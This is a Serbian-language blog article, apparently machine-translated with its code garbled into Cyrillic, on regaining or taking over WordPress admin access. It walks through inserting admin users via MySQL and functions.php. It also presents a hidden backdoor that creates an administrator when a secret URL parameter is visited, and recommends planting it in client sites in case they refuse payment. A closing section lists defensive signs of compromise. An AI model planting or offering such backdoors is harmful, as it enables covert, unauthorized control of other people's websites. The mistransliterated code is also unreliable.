Како се хакирати на веб страницу ВордПресс, потпуни водич

Како се хакира на веб страницу ВордПресс, комплетан водич


Не оправдавамо, не одобравамо нити охрабрујемо било какво илегално или злонамерно понашање! Сврха овог чланка је објаснити како да хакујете или повратите приступ ВордПресс веб локацији која вам припада или да имате права на уређивање, администрацију и приступ. Шта год да радите, то радите сами. Нисмо одговорни за ваше поступке. Овај водич служи само у образовне сврхе.

Описане методе помоћи ће вам да вратите приступ локацији чак и ако више немате налог, али ће вам требати неке информације о тој локацији и неће вам помоћи да упаднете у било коју случајну ВордПресс инсталацију.

У овом водичу ћемо вам показати:

  • Како се хакира на веб страницу ВордПресс
  • Како створити бацкдоор у ВордПресс-у
  • Како отворити нови кориснички налог путем ФТП-а
  • 10 знакова да је ваша веб страница ВордПресс хакована

Како се хакира на веб страницу ВордПресс, комплетан водич

Ситуације у којима можете себи помоћи

Ако се налазите у некој од следећих ситуација, наше методе ће вам помоћи да повратите приступ:

  • заборавили сте корисничко име или адресу е-поште
  • опција ресетовања лозинке не ради на хостинг серверу
  • ресетирајте лозинку е-поште не долазе
  • више немате приступ адреси е-поште налога
  • знате корисничко име и лозинку, али комбинација једноставно не функционише

Да бисте користили методе описане у наставку, требаће вам само једно од следећег:

  • ФТП приступ серверу, или
  • цПанел приступ серверу, или
  • приступ МиСКЛ бази података и могућност даљинског повезивања с њом

Метода бр. 1 – МиСКЛ начин

Овом методом промените лозинку (или корисничко име ако је потребно) постојећег корисника или отворите нови налог. Требат ће вам цПанел приступ или усмјерити МиСКЛ приступ бази података веб локације. Започнимо променом лозинке постојећег корисника.

Ако користите цПанел, пријави (цПанелу се увек може приступити преко хттпс://иоурсите.цом:2083 линк), пронађите и отворите пхпМиАдмин. Списак база података и табела налази се на левој страни. Тражите сто на којем се завршава _усерс. Вероватно ће бити вп_усерс, али ако на серверу имате инсталирано више веб страница ВордПресс, морате пронаћи праву.

У десној табели ће бити корисник којег желите да уређујете у њој. Следите исти поступак ако се повезујете са МиСКЛ преко неког спољног клијента СКЛиог. Једном када пронађете табелу и стварни кориснички запис, време је да промените лозинку.

Као што сте вероватно схватили до сада, лозинка се чува у усер_пасс поље, искомбиновано помоћу алгоритма МД5. Отвори онлине МД5 генератор унесите лозинку коју желите да употребите и кликните на “Хасх”. Копирајте генерисани низ и замените оригиналну лозинку с тим. У пхпМиАдмин-у можете да уредите поље двоструким кликом на њега. Процедура је слична код других МиСКЛ клијената. Сачувајте промене и пријавите се на ВордПресс са новом лозинком.

Табела корисника ВП-а

Корисничка имена, шифроване лозинке и е-поруке се чувају у вп_усерс табела базе података

Још увек се користи метода 1 – креирање новог корисника

Стварање новог корисника је мало сложеније, али и даље руковање за мање од једног минута. Креирајте нови запис у табели корисника и попуните: усер_логин, усер_пасс (хасхед, користећи МД5 функцију описану горе) и усер_емаил. Сва остала поља могу остати празна; нису битне. Сачувајте нови запис. Једном сачуван, МиСКЛ ће му дати јединствени ИД. То је број у пољу ИД. Запамти то.

Сада иди на _усермета сто. Запамтити, префикс табеле мора бити исти као и онај корисника. На пример вп_усерс и вп_усерсмета. Ако префикс није исти, уређујете погрешну табелу (неке друге ВП инсталације) и нови налог неће радити. Направит ћемо два нова записа. Занемарите то умета_ид поље за обојицу. Комплет ИД корисник поље до вредности коју сте управо запамтили (нова ИД вредност у табели корисника). За први сет рекорда мета_кеи до впцт_усер_левел и мета_валуе до 10. За други мета_кеи до впцт_цапа способности и мета_валуе до а: 1: {с: 13: "администратор"; б: 1;}. Сачувај оба. Готови сте – пријавите се!

Метода бр. 2 – начин рада функције.пхп

Овај приступ се може користити или уређивањем функције.пхп преко цПанела или коришћењем ФТП клијента за то. Ако користите цПанел, пронађите Филе Манагер и отворите га. Прво морамо пронаћи директоријум активне теме.

Иди на публиц_хтмл / вп_цонтент / тхемес фолдер. Ако одмах видите своју тему и знате која је – сјајна. Отворите његову фасциклу и започните уређивање фунцтион.пхп. Ако не, отворите веб локацију, кликните десним тастером миша било где, одаберите „Прикажи извор“. Затим притисните Цтрл + Ф и почните да куцате /Теме/ ускоро ћете истакнути пуно УРЛ-ова и препознаћете назив мапе активне теме.

Пронађите га у структури датотека, отворите и почните с уређивањем фунцтион.пхп. Копирајте / залепите следећи код на крају датотеке. Пазите на затварање ?> ПХП ознаке ако их имате. Морају бити на задњој линији. Зато убаците код пре њих.

$ нев_усер_емаил = 'миемаил@домаин.цом';
$ нев_усер_пассворд = '12345';

иф (! корисничко име_екистс ($ нев_усер_емаил)) {
$ усер_ид = вп_цреате_усер ($ нев_усер_емаил, $ нев_усер_пассворд, $ нев_усер_емаил);

вп_упдате_усер (низ ('ИД' => $ усер_ид, 'надимак' => $ нев_усер_емаил));

$ усер = нев ВП_Усер ($ усер_ид);
$ усер-> сет_роле ('администратор');
}

Уредите само прве две линије кода да бисте одражавали свој нови налог. Ако већ постоји корисник на ВП-у са том е-поштом, нови налог неће бити креиран, па проверите да је нови. Промените и лозинку – немојте да вас хакују клинци са скрипта. Након што сачувате датотеку, једноставно отворите веб локацију, код ће се покренути, креиран је нови налог са привилегованим привилегијама и моћи ћете да се пријавите са њим.

Након што то учините, не заборавите да избришете код фунцтион.пхп.

Остале методе хаковања

Познавајући лозинку за ФТП, цПанел или МиСКЛ доказујете да имате легитимно право приступа серверу и да бисте због тога морали да имате и приступ ВордПресс инсталацијама. Ако немате ниједан од тих налога, онда вам није добро (хаковање на сајтове других људи), а то није лепо!

Имајте на уму да је неовлашћени приступ било ком рачунару, веб локацијама или серверима озбиљан злочин и да се одмах у њему поступа у већини земаља.

Ако се плашите да може бити хакован ваш ВордПресс сајт, погледајте ову страницу бесплатним безбедносним скенером за ВордПресс. Ако немате времена да поставите свој блог, дозволите нам да то учинимо за вас.

Како створити бацкдоор у ВордПресс-у

Када су улазна врата затворена, можете покушати са стражњим вратима. Ово може звучати као злонамерни начин коришћења кода за улазак на веб локацију без приступа њој, али заправо постоје случајеви када требате да контролишете сопствену веб локацију ако ју је неко украо.

Ако направите веб странице за друге људе нешто што радите, пре или касније наћи ће се клијент који ће одбити да вам плати за ваш рад; клијент који ће избрисати ваше податке за пријаву и преузети контролу над свим што сте урадили. Понекад ће бити довољно да створите новог корисника путем ФТП-а или да ресетујете лозинку. Кад то није довољно, можда желите да се вратите натраг или да створите бацкдоор приступ администраторима.

Али ако сте одлучили да сакријете мали део кода у вашем ВордПресс окружењу, уштедите себи нешто достојанства и стекните приступ веб локацији ВордПресс са привилегијама администратора. И ту почињу игре.

Без обзира колико пута тај лопов избрисао ваше податке или вратио сигурносну копију на серверу који вероватно посједује, постоји шанса да не зна ништа о стражњим улазима. Да јесте, вероватно му не би ни требала помоћ у постављању ВордПресса, зар не?

Направите позадину:

ОК, доста са разговором; ево парчета кода који ће вам требати да бисте обавили посао:

  1. Отворите фунцтион.пхп датотеку
  2. Копирајте / налепите следећи код:
  3. додавање ('вп_хеад', 'вплооп_бацкдоор');
    функција вплооп_бацкдоор () {
    Иф ($ _ГЕТ ['бацкдоор'] == 'кноцккноцк') {
    захтевати ('вп-укључује / регистрација.пхп');
    Иф (! Усернаме_екистс ('усернаме')) {
    $ усер_ид = вп_цреате_усер ('име', 'пролаз');
    $ усер = нев ВП_Усер ($ усер_ид);
    $ усер-> сет_роле ('администратор');
    }
    }
    }
    ?>
  4. Сачувај промене

Ако код оставите какав је, посета је све што бисте морали да урадите да бисте створили новог администратора на веб локацији хттп://ввв.иоурдомаин.цом/?бацкдоор=кноцккноцк

Након учитавања странице ваше ново корисничко име је „Име“ и лозинку „Проћи“.

Наравно, можете то променити у коду горе променом ‘наме’ и ‘пасс’ у шта год желите. Такође можете променити везу на задња врата тако што ћете променити ‘задња врата’ и / или ‘кноцккноцк’ на било шта што наиђете.

Испробајте функцију – не само да је забавна, већ вам заиста може помоћи у будућности кад спремате да направите веб локацију за некога коме не можете у потпуности да верујете. Такође бисте требали да ниво своје вештине ВордПресс-а и блогања.

Како отворити нови кориснички налог путем ФТП-а

Отварање нових корисничких налога на ВордПресс-у је врло једноставно. Као администратор, то морате пређите на Администратор страницу корисника где можете да креирате нови налог за било коју корисничку улогу. То се може учинити за неколико секунди и новостворени корисник може се одмах пријавити са датим корисничким именом и лозинком.

Али шта се догађа ако изгубите приступ свом ВордПресс администратору? Ствари се могу мало закомпликовати, али не брините – за вас имамо функцију која вам може спасити живот администратора.

Без обзира да ли је неки други администратор избрисао ваш налог, јесте ли избрисали све кориснике из базе података грешком, користили неисправни додатак или се хаковали, и даље можете да се вратите под контролу. Понекад ћете моћи да приступите само вашем ФТП серверу док ће ХТТП бити ван вашег досега и мораћете да креирате новог администратора. Иако је то може бити риједак случај, сљедећа функција ће вас спасити.

Да бисте креирали нови налог изван административног окружења ВордПресс-а, све што ће вам требати је ФТП приступ вашој веб локацији. Као администратор, требало би да имате све потребне информације да бисте се пријавили на свој сервер и брзо можете креирати нови налог креирањем нове функције у својој теми.

Креирајте нови кориснички налог путем ФТП-а:

  1. Отворите ФТП клијент и повежите се са својим налогом
  2. Идите до вп-садржаја / тема
  3. Отворите фасциклу теме коју користите
  4. Потражите функцију.пхп датотеку и уредите је
  5. Копирајте и залепите следећу функцију:
  6. функција админ_аццоунт () {
    $ усер = 'Корисничко име';
    $ пасс = 'Лозинка';
    $ емаил = 'емаил@домаин.цом';
    иф (! корисничко име_екистс ($ корисник) &&! емаил_екистс ($ емаил)) {
    $ усер_ид = вп_цреате_усер ($ корисник, $ пасс, $ емаил);
    $ усер = нев ВП_Усер ($ усер_ид);
    $ усер-> сет_роле ('администратор');
    }}
    додавање ('инит', 'админ_аццоунт');
    
  7. Промените корисничко име, лозинку и адресу е-поште у нешто јединствено
  8. Сачувај промене

Уверите се да су корисничко име, лозинка и адреса е-поште коју сте поставили у функцији јединствени или на други начин функција неће радити исправно. Након што сачувате измене, готови сте и можете да пређете на свој ВП панел за пријаву. Користите нове податке да бисте се поново пријавили и након што сте верификовали налог, функцију можете избрисати из датотеке фунцтион.пхп.

Горе приказана функција ствара административни налог, али можете га лако модификовати да бисте створили налог са било којом другом улогом корисника. Једноставно промените улогу на 8тх ред кода уреднику, аутору, сараднику, претплатнику или било којој другој корисничкој улози коју сте креирали.

Нажалост, ако сте изгубили свој администраторски налог, изгубили сте и све постове написане под тим корисничким именом. Због тога увек треба да имате резервне копије које лако можете да преузмете. Ако ово читате док имате административни налог, узми ово као подсетник да одмах креираш резервну копију и додајте обележи овај чланак у случају да у будућности морате да отворите налог изван ВордПресс-а.

10 знакова да је ваша веб страница ВордПресс хакована

ВордПресс је огромна платформа за писање блогова. Постоје милиони корисника и чини се да тај број свакодневно брзо расте. Људи чак теже да преносе своје веб странице креиране у другим системима за управљање садржајем у овај систем отвореног кода чешће него што можда мислите. И док је ово добро, то значи и то хакери ће такође ставити ВордПресс на прво место када покушају извршити инвазију на насумичне локације.

Обично ако вас хакују, одмах ћете то знати. Ваша веб локација ће постати недоступна; нећете се моћи пријавити, а понекад ће чак и хакер оставити поруку на насловној страници. Али чешће од тога, можда чак ни не примећујеш да се нешто променило. У овом делу чланка, показаћемо вам неколико знакова који би могли да вам покажу да је ваша веб локација ВордПресс хакована и неколико решења проблема..

1. Неуспешна пријава

Овај знак је прилично очигледан. Ако сте неко време користили комбинацију корисничког имена и лозинке, а да нисте имали проблема, можда ћете постати сумњиви ако изненада ВордПресс не препозна ваш налог. Ако се хакер мора пријавити на вашу веб локацију, велике су шансе да ће брзо промијенити привилегије вашег администратора.

Можда је морао да промени вашу лозинку или је у потпуности избрисао ваш налог. Пре него што почнете да паничарите након што вас први пут ВордПресс пошаље у вези са погрешним корисничким именом / лозинком, узмите у обзир чињеницу да сте можда унели погрешну комбинацију или да сте можда укључили дугме за закључавање слова.

Решење: Покушајте да вратите лозинку путем е-поште или користите други налог да бисте се поново пријавили. Да бисте били сигурни да се пријава остаје сигурна, препоручујемо инсталирање Пријави се Ниња додатак за ВордПресс.

2. Злонамерни садржај се додаје вашој веб локацији

Сајт садржи упозорење о злонамерном софтверу

Ако почнете примјећивати непознати садржај на својој веб локацији, можда ћете почети забрињавати. Када добију прилику да приступе вашем административном подручју, хакери ће моћи да мењају ваше језгро и датотеке и теме и додатке. То значи да могу променити све што желе.

Док ће неки хакери драстично модификовати изглед ваше веб локације и можда чак рећи како сте се хаковали, други ће бити много суптилнији у вези с тим.

Решење: Покушајте потражити скривени садржај у коду веб локације. Можда постоје везе до хакера са злонамерним веб локацијама засађених у дну странице вашег вебсајта или су можда инсталирани скочни прозори који ће се редовно отварати вашим клијентима. Користите Сецурити Ниња за скенирање ваше веб странице или непрекидно праћење веб локације за такве проблеме.

3. Сумњиве посете

Ако не пратите своју веб локацију, требало би да почнете са тим одмах. Једноставан начин рада је коришћење Гоогле аналитике која вам, између многих других функција, може рећи колико посета дођете и одакле долазе те посете. Након неког времена, упознаћете вашу веб страницу. То значи да ћете знати одакле долазе посете, знаћете када покренете нову кампању и када се у дивљини појаве нове промотивне везе.

Али ако изненада приметите да ваша веб локација добија огроман број нових посета из сумњивог домена, хтећете даље да то истражите јер ће ваша веб локација можда бити хакована. Обично ће такве посете довести до стопостотног напуштања почетне странице што значи да је приступљено само једној страници. Хакери ће често користити аутоматизоване системе који ће довести друге лоше странице на ваше. Било да се ради о лошем коду који се извршава на вашој веб локацији или сте постали део мреже нежељене поште, ствари могу постати озбиљне и мораћете да проверите на веб локацији злонамерни код.

Решење: Употреба Гоогле алатке за вебмастере да пронађете сумњиве домене

4. Нагли пад саобраћаја

Сигурно прегледавање статуса веб локације

За разлику од последњег споменутог знака хакирања, овај вас може упозорити јер нагло опада број посета. Уместо да вас упућују нове посете, хакер може да шаље посете са ваше веб локације. То се може догодити зато што је хакер преусмерио вашу веб локацију на другу. Други разлог за мање посетилаца је тај што је Гоогле на вашу веб локацију ставио на црну листу. Ова акција би показала поруку сваком кориснику који можда одлучи да не отвори вашу веб локацију јер је заражен.

Решење: Користите Гоогле-ове Сигурно прегледавање статуса веб локације да бисте проверили да ли је ваша веб локација означена као несигурна и да ли је тренутно опасна за посету.

5. Резултати претраживача су чудни

Ако на својој веб локацији нисте приметили никакве промене, али откријете да су резултати претраживања у Гоогле-у и другим претраживачима чудни (приказујте различите наслове и друге мета-податке), то може бити јасан знак хаковане веб локације. Хакер је можда променио ваш садржај на начин који може бити видљив само стручњаку. Ипак, промена би била видљива у резултатима претраживача.

Решење: Проверите своју веб локацију Гоогле алатке за вебмастере, и проверите да ли се ваша веб локација хаковала овим бесплатни онлине алат.

6. Не можете слати / примати е-пошту

Једном када хакер добије приступ вашој веб локацији, вјероватно ће то пожељети користите свој сервер за нежељену пошту свима другима. Када откријете да не можете да шаљете или примате нове поруке е-поште са свог ВордПресс-а, то може бити јасан знак да сте се хаковали. Још једном проверите своју е-пошту, а затим је проверите код свог провајдера да бисте били сигурни да нема грешака.

Решење: Тестирајте свој ВордПресс функција поште са овим бесплатним додатком.

7. Сајт не постоји

сервер није пронађен

Има случајева када хакери неће приступити вашој веб локацији како би поставили злонамерни код, преусмеравали кориснике или користили вашу е-пошту за нежељену пошту. Понекад, све што ће желети је да обруше вашу веб локацију. Ретко, хакер ће успешно избрисати све са читавог сервера. Зато је важно да своје датотеке угостите у реномираној хостинг компанији која ће преузети сигурност и такође одржавати дневне или најмање недељне сигурносне копије веб локације. Добра је пракса да, такође, повремено правите сигурносне копије како бисте веб локацију могли брзо да вратите.

Решење: Инсталирајте један од најбољих додатака за управљање резервним копијама у ВордПресс-у.

8. Сумњиве датотеке

Слично је злонамерном садржају који се може додати постојећим датотекама, хакер може посадити додатне датотеке било где у вашој матичној мапи. Добро је знати свој пут око ВордПресс-а, али ако нисте тако искусни, требало би вам на располагању сигурносни алат који може да провери све ваше датотеке и активности. Недавно смо прегледали Сецурити Ниња који је савршен алат за проверу свих ваших ВордПресс датотека.

Решење: Покушајте да потражите датотеке које не припадају вашој ВордПресс инсталацији. Користите Сецурити Ниња да бисте редовно скенирали вашу веб локацију и аутоматски пронашли те датотеке. Затим обришите датотеке или уклоните злонамерни код из заражених датотека. Не заборавите додатак Цоре Сцаннер за Сецурити Ниња.

9. Нови чланови

У зависности од странице, можда сте једини који може додати нове чланове. У том случају е-порука која вам говори о ново регистрованим корисницима може покренути аларм. Ако постоје други администратори који имају могућност додавања нових чланова, проверите са њима сумњиве активности.

Решење: Промените УРЛ за пријаву бесплатним додатком, ограничите приступ својој ВордПресс страници за пријављивање користећи .хтпассвд датотеку и користите Логин Ниња да бисте стално заштитили образац за пријаву..

10. Проверите заказане догађаје на вашем серверу

Понекад хакер неће учинити нешто на вашој веб локацији чим нађе свој пут. Уместо тога, они ће напустити заказане догађаје што би могло да наштети вашој веб локацији у будућности. Ова техника је опасна јер хакер у почетку може неискусну жртву оставити безначајном. Можда сте заражени и ништа о томе не знате.

Решење: Проверите своје ЦРОН задатке на серверу који користите и уверите се да нема сумњивих заказаних задатака.

Окончање

Надамо се да ће вам овај чланак помоћи у управљању чак и сигурнијим ВордПресс веб местом и да ће вам помоћи да повратите приступ њему у лошим ситуацијама. И чак и ако је ваша веб локација чиста, немојте то узимати здраво за готово.
Увек будите сигурни да је ваш блог безбедан колико и може бити. Предлажемо сигурносне додатке за ВордПресс који вам могу уштедети највише. Ипак, немојте бити онај који користи несигурну лозинку и будите опрезни приликом харања на сопствену ВордПресс локацију.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map